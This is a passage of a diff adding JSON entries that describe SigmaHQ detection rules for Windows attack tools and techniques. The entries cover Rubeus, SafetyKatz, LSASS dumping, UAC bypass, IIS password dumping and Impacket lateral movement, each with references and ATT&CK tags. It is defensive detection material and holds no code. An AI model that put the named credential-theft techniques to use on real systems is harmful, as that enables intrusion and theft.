"e96253b8-6b3b-4f90-9e59-3b24b99cf9b4", + "value": "KrbRelay Hack Tool" + }, + { + "description": "Detects KrbRelayUp used to perform a universal no-fix local privilege escalation in windows domain environments where LDAP signing is not enforced", + "meta": { + "author": "Florian Roth", + "creation_date": "2022/04/26", + "falsepositive": [ + "Unlikely" + ], + "filename": "proc_creation_win_hack_krbrelayup.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/Dec0ne/KrbRelayUp", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hack_krbrelayup.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1558.003", + "attack.lateral_movement", + "attack.t1550.003" + ] + }, + "uuid": "12827a56-61a4-476a-a9cb-f3068f191073", + "value": "KrbRelayUp Hack Tool" + }, + { + "description": "Detects the execution of the hacktool Rubeus via PE information of command line parameters", + "meta": { + "author": "Florian Roth", + "creation_date": "2018/12/19", + "falsepositive": [ + "Unlikely" + ], + "filename": "proc_creation_win_hack_rubeus.yml", + "level": "critical", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.harmj0y.net/blog/redteaming/from-kekeo-to-rubeus/", + "https://m0chan.github.io/2019/07/31/How-To-Attack-Kerberos-101.html", + "https://github.com/GhostPack/Rubeus", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hack_rubeus.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1003", + "attack.t1558.003", + "attack.lateral_movement", + "attack.t1550.003" + ] + }, + "uuid": "7ec2c172-dceb-4c10-92c9-87c1881b7e18", + "value": "Rubeus Hack Tool" + }, + { + "description": "Detects the execution of the hacktool SafetyKatz via PE information and default Image name", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/10/20", + "falsepositive": [ + "Unlikely" + ], + "filename": "proc_creation_win_hack_safetykatz.yml", + "level": "critical", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/GhostPack/SafetyKatz", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hack_safetykatz.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1003.001" + ] + }, + "uuid": "b1876533-4ed5-4a83-90f3-b8645840a413", + "value": "SafetyKatz Hack Tool" + }, + { + "description": "Detects the execution of SecurityXploded Tools", + "meta": { + "author": "Florian Roth", + "creation_date": "2018/12/19", + "falsepositive": [ + "Unlikely" + ], + "filename": "proc_creation_win_hack_secutyxploded.yml", + "level": "critical", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://securityxploded.com/", + "https://cyberx-labs.com/blog/gangnam-industrial-style-apt-campaign-targets-korean-industrial-companies/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hack_secutyxploded.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1555" + ] + }, + "uuid": "7679d464-4f74-45e2-9e01-ac66c5eb041a", + "value": "SecurityXploded Tool" + }, + { + "description": "Detects the execution of the hacktool SharPersist - used to deploy various different kinds of persistence mechanisms", + "meta": { + "author": "Florian Roth", + "creation_date": "2022/09/15", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_hack_sharpersist.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.mandiant.com/resources/blog/sharpersist-windows-persistence-toolkit", + "https://github.com/mandiant/SharPersist", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hack_sharpersist.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1053" + ] + }, + "uuid": "26488ad0-f9fd-4536-876f-52fea846a2e4", + "value": "SharPersist Usage" + }, + { + "description": "Detects SharpLdapWhoami, a whoami alternative by asking the LDAP service on a domain controller", + "meta": { + "author": "Florian Roth", + "creation_date": "2022/08/29", + "falsepositive": [ + "Programs that use the same command line flags" + ], + "filename": "proc_creation_win_hack_sharpldapwhoami.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/bugch3ck/SharpLdapWhoami", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hack_sharpldapwhoami.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1033", + "car.2016-03-001" + ] + }, + "uuid": "d9367cbb-c2e0-47ce-bdc0-128cb6da898d", + "value": "SharpLdapWhoami" + }, + { + "description": "Detects the execution of the PoC that can be used to exploit Sysmon CVE-2022-41120", + "meta": { + "author": "Florian Roth", + "creation_date": "2022/12/04", + "falsepositive": [ + "Unlikely" + ], + "filename": "proc_creation_win_hack_sysmoneop.yml", + "level": "critical", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/Wh04m1001/SysmonEoP", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hack_sysmoneop.yml" + ], + "tags": [ + "cve.2022.41120", + "attack.t1068", + "attack.privilege_escalation" + ] + }, + "uuid": "8a7e90c5-fe6e-45dc-889e-057fe4378bd9", + "value": "SysmonEOP Hack Tool" + }, + { + "description": "Detects the use of Windows Credential Editor (WCE)", + "meta": { + "author": "Florian Roth", + "creation_date": "2019/12/31", + "falsepositive": [ + "Another service that uses a single -s command line switch" + ], + "filename": "proc_creation_win_hack_wce.yml", + "level": "critical", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.ampliasecurity.com/research/windows-credentials-editor/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hack_wce.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1003.001", + "attack.s0005" + ] + }, + "uuid": "7aa7009a-28b9-4344-8c1f-159489a390df", + "value": "Windows Credential Editor" + }, + { + "description": "Detects the use of HandleKatz, a tool that demonstrates the usage of cloned handles to Lsass in order to create an obfuscated memory dump of the same", + "meta": { + "author": "Florian Roth", + "creation_date": "2022/08/18", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_handlekatz.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/codewhitesec/HandleKatz", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_handlekatz.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1003.001" + ] + }, + "uuid": "ca621ba5-54ab-4035-9942-d378e6fcde3c", + "value": "HandleKatz LSASS Dumper Usage" + }, + { + "description": "Execute Hashcat.exe with provided SAM file from registry of Windows and Password list to crack against", + "meta": { + "author": "frack113", + "creation_date": "2021/12/27", + "falsepositive": [ + "Tools that accidentally use the same command line flags and values" + ], + "filename": "proc_creation_win_hashcat.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1110.002/T1110.002.md#atomic-test-1---password-cracking-with-hashcat", + "https://hashcat.net/wiki/doku.php?id=hashcat", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hashcat.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1110.002" + ] + }, + "uuid": "39b31e81-5f5f-4898-9c0e-2160cfc0f9bf", + "value": "Password Cracking with Hashcat" + }, + { + "description": "This is an unusual method to download files. It starts a browser headless and downloads a file from a location. This can be used by threat actors to download files.", + "meta": { + "author": "Sreeman, Florian Roth", + "creation_date": "2022/01/04", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_headless_browser_file_download.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/mrd0x/status/1478234484881436672?s=12", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_headless_browser_file_download.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1105" + ] + }, + "uuid": "0e8cfe08-02c9-4815-a2f8-0d157b7ed33e", + "value": "File Download with Headless Browser" + }, + { + "description": "Identifies usage of hh.exe executing recently modified .chm files.", + "meta": { + "author": "E.M. Anhaus (originally from Atomic Blue Detections, Dan Beavin), oscd.community", + "creation_date": "2019/10/24", + "falsepositive": [ + "Unlikely" + ], + "filename": "proc_creation_win_hh_chm.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218.001/T1218.001.md", + "https://eqllib.readthedocs.io/en/latest/analytics/b25aa548-7937-11e9-8f5c-d46d6d62a49e.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hh_chm.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1218.001" + ] + }, + "uuid": "68c8acb4-1b60-4890-8e82-3ddf7a6dba84", + "value": "HH.exe Execution" + }, + { + "description": "Detects usage of hh.exe to execute/download remotely hosted .chm files.", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/09/29", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_hh_chm_http.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.splunk.com/en_us/blog/security/follina-for-protocol-handlers.html", + "https://github.com/redcanaryco/atomic-red-team/blob/1cf4dd51f83dcb0ebe6ade902d6157ad2dbc6ac8/atomics/T1218.001/T1218.001.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hh_chm_http.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1218.001" + ] + }, + "uuid": "f57c58b3-ee69-4ef5-9041-455bf39aaa89", + "value": "HH.exe Remote CHM File Execution" + }, + { + "description": "Monitors for the hiding possible malicious files in the C:\\Windows\\Fonts\\ location. This folder doesn't require admin privillege to be written and executed from.", + "meta": { + "author": "Sreeman", + "creation_date": "2020/04/21", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_hiding_malware_in_fonts_folder.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://thedfirreport.com/2020/04/20/sqlserver-or-the-miner-in-the-basement/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hiding_malware_in_fonts_folder.yml" + ], + "tags": [ + "attack.t1211", + "attack.t1059", + "attack.defense_evasion", + "attack.persistence" + ] + }, + "uuid": "ae9b0bd7-8888-4606-b444-0ed7410cb728", + "value": "Writing Of Malicious Files To The Fonts Folder" + }, + { + "description": "A General detection for sdclt being spawned as an elevated process. This could be an indicator of sdclt being used for bypass UAC techniques.", + "meta": { + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "creation_date": "2020/05/02", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_high_integrity_sdclt.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/OTRF/detection-hackathon-apt29/issues/6", + "https://threathunterplaybook.com/evals/apt29/detections/3.B.2_C36B49B5-DF58-4A34-9FE9-56189B9DEFEA.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_high_integrity_sdclt.yml" + ], + "tags": [ + "attack.privilege_escalation", + "attack.defense_evasion", + "attack.t1548.002" + ] + }, + "uuid": "40f9af16-589d-4984-b78d-8c2aec023197", + "value": "High Integrity Sdclt Process" + }, + { + "description": "Detects the use of CreateMiniDump hack tool used to dump the LSASS process memory for credential extraction on the attacker's machine", + "meta": { + "author": "Florian Roth", + "creation_date": "2019/12/22", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_hktl_createminidump.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://ired.team/offensive-security/credential-access-and-credential-dumping/dumping-lsass-passwords-without-mimikatz-minidumpwritedump-av-signature-bypass", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hktl_createminidump.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1003.001" + ] + }, + "uuid": "36d88494-1d43-4dc0-b3fa-35c8fea0ca9d", + "value": "CreateMiniDump Hacktool" + }, + { + "description": "Detects execution of UACMe (a tool used for UAC bypass) via default PE metadata", + "meta": { + "author": "Christian Burkard, Florian Roth", + "creation_date": "2021/08/30", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_hktl_uacme_uac_bypass.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/hfiref0x/UACME", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hktl_uacme_uac_bypass.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1548.002" + ] + }, + "uuid": "d38d2fa4-98e6-4a24-aff1-410b0c9ad177", + "value": "UAC Bypass Tool UACMe Akagi" + }, + { + "description": "Detects a suspicious child process of a Microsoft HTML Help system when executing compiled HTML files (.chm)", + "meta": { + "author": "Maxim Pavlunin", + "creation_date": "2020/04/01", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_html_help_spawn.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/chm-badness-delivers-a-banking-trojan/", + "https://github.com/elastic/protections-artifacts/commit/746086721fd385d9f5c6647cada1788db4aea95f#diff-27939090904026cc396b0b629c8e4314acd6f5dac40a676edbc87f4567b47eb7", + "https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/higaisa-or-winnti-apt-41-backdoors-old-and-new/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_html_help_spawn.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1218.001", + "attack.t1218.010", + "attack.t1218.011", + "attack.execution", + "attack.t1059.001", + "attack.t1059.003", + "attack.t1059.005", + "attack.t1059.007", + "attack.t1047", + "attack.t1566", + "attack.t1566.001", + "attack.initial_access", + "attack.t1218" + ] + }, + "uuid": "52cad028-0ff0-4854-8f67-d25dfcbc78b4", + "value": "HTML Help Shell Spawn" + }, + { + "description": "Detects suspicious Hangul Word Processor (Hanword) sub processes that could indicate an exploitation", + "meta": { + "author": "Florian Roth", + "creation_date": "2019/10/24", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_hwp_exploits.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.securitynewspaper.com/2016/11/23/technical-teardown-exploit-malware-hwp-files/", + "https://www.hybrid-analysis.com/search?query=context:74940dcc5b38f9f9b1a0fea760d344735d7d91b610e6d5bd34533dd0153402c5&from_sample=5db135000388385a7644131f&block_redirect=1", + "https://twitter.com/cyberwar_15/status/1187287262054076416", + "https://blog.alyac.co.kr/1901", + "https://en.wikipedia.org/wiki/Hangul_(word_processor)", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hwp_exploits.yml" + ], + "tags": [ + "attack.initial_access", + "attack.t1566.001", + "attack.execution", + "attack.t1203", + "attack.t1059.003", + "attack.g0032" + ] + }, + "uuid": "023394c4-29d5-46ab-92b8-6a534c6f447b", + "value": "Suspicious HWP Sub Processes" + }, + { + "description": "Detect use of icacls to deny access for everyone in Users folder sometimes used to hide malicious files", + "meta": { + "author": "frack113", + "creation_date": "2022/07/18", + "falsepositive": [ + "Legitimate use" + ], + "filename": "proc_creation_win_icacls_deny.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://app.any.run/tasks/1df999e6-1cb8-45e3-8b61-499d1b7d5a9b/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_icacls_deny.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1564.001" + ] + }, + "uuid": "4ae81040-fc1c-4249-bfa3-938d260214d9", + "value": "Use Icacls to Hide File to Everyone" + }, + { + "description": "Detects use of aspnet_regiis to decrypt Microsoft IIS connection strings. An attacker with Microsoft IIS web server access via a webshell or alike can decrypt and dump any hardcoded connection strings, such as the MSSQL service account password using aspnet_regiis command.", + "meta": { + "author": "Tim Rauch", + "creation_date": "2022/09/28", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_iis_connection_strings_decryption.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.elastic.co/guide/en/security/current/microsoft-iis-connection-strings-decryption.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_iis_connection_strings_decryption.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1003" + ] + }, + "uuid": "97dbf6e2-e436-44d8-abee-4261b24d3e41", + "value": "Microsoft IIS Connection Strings Decryption" + }, + { + "description": "Disables HTTP logging on a Windows IIS web server as seen by Threat Group 3390 (Bronze Union)", + "meta": { + "author": "frack113", + "creation_date": "2022/01/09", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_iis_http_logging.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.002/T1562.002.md#atomic-test-1---disable-windows-iis-http-logging", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_iis_http_logging.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1562.002" + ] + }, + "uuid": "e4ed6030-ffe5-4e6a-8a8a-ab3c1ab9d94e", + "value": "Disable Windows IIS HTTP Logging" + }, + { + "description": "Detects the Internet Information Services (IIS) command-line tool, AppCmd, being used to list passwords", + "meta": { + "author": "Tim Rauch, Janantha Marasinghe", + "creation_date": "2022/11/08", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_iis_service_account_password_dumped.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.elastic.co/guide/en/security/current/microsoft-iis-service-account-password-dumped.html", + "https://twitter.com/0gtweet/status/1588815661085917186?cxt=HHwWhIDUyaDbzYwsAAAA", + "https://www.netspi.com/blog/technical/network-penetration-testing/decrypting-iis-passwords-to-break-out-of-the-dmz-part-2/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_iis_service_account_password_dumped.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1003" + ] + }, + "uuid": "2d3cdeec-c0db-45b4-aa86-082f7eb75701", + "value": "Microsoft IIS Service Account Password Dumped" + }, + { + "description": "Detects unusual parent or children of the ImagingDevices.exe (Windows Contacts) and Wabmig.exe (Microsoft Address Book Import Tool) processes as seen being used with bumblebee activity", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/09/27", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_imaging_devices_unusual_parents.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://thedfirreport.com/2022/09/26/bumblebee-round-two/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_imaging_devices_unusual_parents.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.execution" + ] + }, + "uuid": "f11f2808-adb4-46c0-802a-8660db50fa99", + "value": "ImagingDevices Unusual Parent Or Child Processes" + }, + { + "description": "Detects the execution of different compiled Windows binaries of the impacket toolset (based on names or part of their names - could lead to false positives)", + "meta": { + "author": "Florian Roth", + "creation_date": "2021/07/24", + "falsepositive": [ + "Legitimate use of the impacket tools" + ], + "filename": "proc_creation_win_impacket_compiled_tools.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/ropnop/impacket_static_binaries/releases/tag/0.9.21-dev-binaries", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_impacket_compiled_tools.yml" + ], + "tags": [ + "attack.execution", + "attack.t1557.001" + ] + }, + "uuid": "4627c6ae-6899-46e2-aa0c-6ebcb1becd19", + "value": "Impacket Tool Execution" + }, + { + "description": "Detects wmiexec/dcomexec/atexec/smbexec from Impacket framework", + "meta": { + "author": "Ecco, oscd.community, Jonhnathan Ribeiro", + "creation_date": "2019/09/03", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_impacket_lateralization.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/SecureAuthCorp/impacket/blob/8b1a99f7c715702eafe3f24851817bb64721b156/examples/wmiexec.py", + "https://github.com/SecureAuthCorp/impacket/blob/8b1a99f7c715702eafe3f24851817bb64721b156/examples/atexec.py", + "https://github.com/SecureAuthCorp/impacket/blob/8b1a99f7c715702eafe3f24851817bb64721b156/examples/smbexec.py", + "https://github.com/SecureAuthCorp/impacket/blob/8b1a99f7c715702eafe3f24851817bb64721b156/examples/dcomexec.py", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_impacket_lateralization.yml" + ], + "tags": [ + "attack.execution", + "attack.t1047", + "attack.lateral_movement", + "attack.t1021.003" + ] + }, + "uuid": "10c14723-61c7-4c75-92ca-9af245723ad2", + "value": "Impacket Lateralization Detection" + }, + { + "description": "Adversaries may install a root certificate on a compromised system to avoid warnings when connecting to adversary controlled web servers.", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/09/09", + "falsepositive": [ + "Unlikely" + ], + "filename": "proc_creation_win_import_cert_susp_locations.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.microsoft.com/security/blog/2022/09/07/profiling-dev-0270-phosphorus-ransomware-operations/", + "https://docs.microsoft.com/en-us/powershell/module/pki/import-certificate?view=windowsserver2022-ps", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_import_cert_susp_locations.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1553.004" + ] + }, + "uuid": "5f6a601c-2ecb-498b-9c33-660362323afa", + "value": "Root Certificate Installed From Susp Locations" + }, + { + "description": "Detect indirect command execution via Program Compatibility Assistant (pcalua.exe or forfiles.exe).", + "meta": { + "author": "E.M. Anhaus (originally from Atomic Blue Detections, Endgame), oscd.community", + "creation_date": "2019/10/24", + "falsepositive": [ + "Need to use extra processing with 'unique_count' / 'filter' to focus on outliers as opposed to commonly seen artifacts.", + "Legitimate usage of scripts." + ], + "filename": "proc_creation_win_indirect_cmd.yml", + "level": "low", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1202/T1202.md", + "https://eqllib.readthedocs.io/en/latest/analytics/884a7ccd-7305-4130-82d0-d4f90bc118b6.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_indirect_cmd.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1202" + ] + }, + "uuid": "fa47597e-90e9-41cd-ab72-c3b74cfb0d02", + "value": "Indirect Command Execution" + }, + { + "description": "Detects the use of native Windows tool, forfiles to execute a file. Adversaries may abuse utilities that allow for command execution to bypass security restrictions that limit the use of command-line interpreters.", + "meta": { + "author": "Tim Rauch (rule), Elastic (idea)", + "creation_date": "2022/10/17", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_indirect_command_execution_forfiles.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/elastic/protections-artifacts/commit/746086721fd385d9f5c6647cada1788db4aea95f#diff-73d61931b2c77fde294189ce5d62323b416296a7c23ea98a608f425566538d1a", + "https://lolbas-project.github.io/lolbas/Binaries/Forfiles/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_indirect_command_execution_forfiles.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1202" + ] + }, + "uuid": "a85cf4e3-56ee-4e79-adeb-789f8fb209a8", + "value": "Indirect Command Exectuion via Forfiles" + }, + { + "description": "Executes SCT script using scrobj.dll from a command in entered into a specially prepared INF file.", + "meta": { + "author": "frack113", + "creation_date": "2021/07/13", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_infdefaultinstall.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218/T1218.md#atomic-test-4---infdefaultinstallexe-inf-execution", + "https://lolbas-project.github.io/lolbas/Binaries/Infdefaultinstall/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_infdefaultinstall.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1218" + ] + }, + "uuid": "ce7cf472-6fcc-490a-9481-3786840b5d9b", + "value": "InfDefaultInstall.exe .inf Execution" + }, + { + "description": "Detects encoded base64 MZ header in the commandline", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/07/12", + "falsepositive": [ + "Unlikely" + ], + "filename": "proc_creation_win_inline_base64_mz_header.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://thedfirreport.com/2022/07/11/select-xmrig-from-sqlserver/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_inline_base64_mz_header.yml" + ], + "tags": [ + "attack.execution" + ] + }, + "uuid": "22e58743-4ac8-4a9f-bf19-00a0428d8c5f", + "value": "Base64 MZ Header In CommandLine" + }, + { + "description": "Detects the use of WinAPI Functions via the commandline as seen used by threat actors via the tool winapiexec", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/09/06", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_inline_win_api_access.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/m417z/status/1566674631788007425", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_inline_win_api_access.yml" + ], + "tags": [ + "attack.execution", + "attack.t1106" + ] + }, + "uuid": "ba3f5c1b-6272-4119-9dbd-0bc8d21c2702", + "value": "Accessing WinAPI Via CommandLine" + }, + { + "description": "Detects the registration of a debugger for a program that is available in the logon screen (sticky key backdoor).", + "meta": { + "author": "Florian Roth, oscd.community, Jonhnathan Ribeiro", + "creation_date": "2019/09/06", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_install_reg_debugger_backdoor.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://blogs.technet.microsoft.com/jonathantrull/2016/10/03/detecting-sticky-key-backdoors/", + "https://bazaar.abuse.ch/sample/6f3aa9362d72e806490a8abce245331030d1ab5ac77e400dd475748236a6cc81/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_install_reg_debugger_backdoor.yml" + ], + "tags": [ + "attack.persistence", + "attack.privilege_escalation", + "attack.t1546.008" + ] + }, + "uuid": "ae215552-081e-44c7-805f-be16f975c8a2", + "value": "Suspicious Debugger Registration Cmdline" + }, + { + "description": "Detect an interactive AT job, which may be used as a form of privilege escalation.", + "meta": { + "author": "E.M. Anhaus (originally from Atomic Blue Detections, Endgame), oscd.community", + "creation_date": "2019/10/24", + "falsepositive": [ + "Unlikely (at.exe deprecated as of Windows 8)" + ], + "filename": "proc_creation_win_interactive_at.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1053.002/T1053.002.md", + "https://eqllib.readthedocs.io/en/latest/analytics/d8db43cf-ed52-4f5c-9fb3-c9a4b95a0b56.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_interactive_at.yml" + ], + "tags": [ + "attack.privilege_escalation", + "attack.t1053.002" + ] + }, + "uuid": "60fc936d-2eb0-4543-8a13-911c750a1dfc", + "value": "Interactive AT Job" + }, + { + "description": "Detects Obfuscated use of Clip.exe to execute PowerShell", + "meta": { + "author": "Jonathan Cheong, oscd.community", + "creation_date": "2020/10/13", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_invoke_obfuscation_clip.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/Neo23x0/sigma/issues/1009", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_invoke_obfuscation_clip.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" + ] + }, + "uuid": "b222df08-0e07-11eb-adc1-0242ac120002", + "value": "Invoke-Obfuscation CLIP+ Launcher" + }, + { + "description": "Detects all variations of obfuscated powershell IEX invocation code generated by Invoke-Obfuscation framework from the following code block", + "meta": { + "author": "Daniel Bohannon (@Mandiant/@FireEye), oscd.community", + "creation_date": "2019/11/08", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_invoke_obfuscation_obfuscated_iex_commandline.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/danielbohannon/Invoke-Obfuscation/blob/f20e7f843edd0a3a7716736e9eddfa423395dd26/Out-ObfuscatedStringCommand.ps1#L873-L888", + 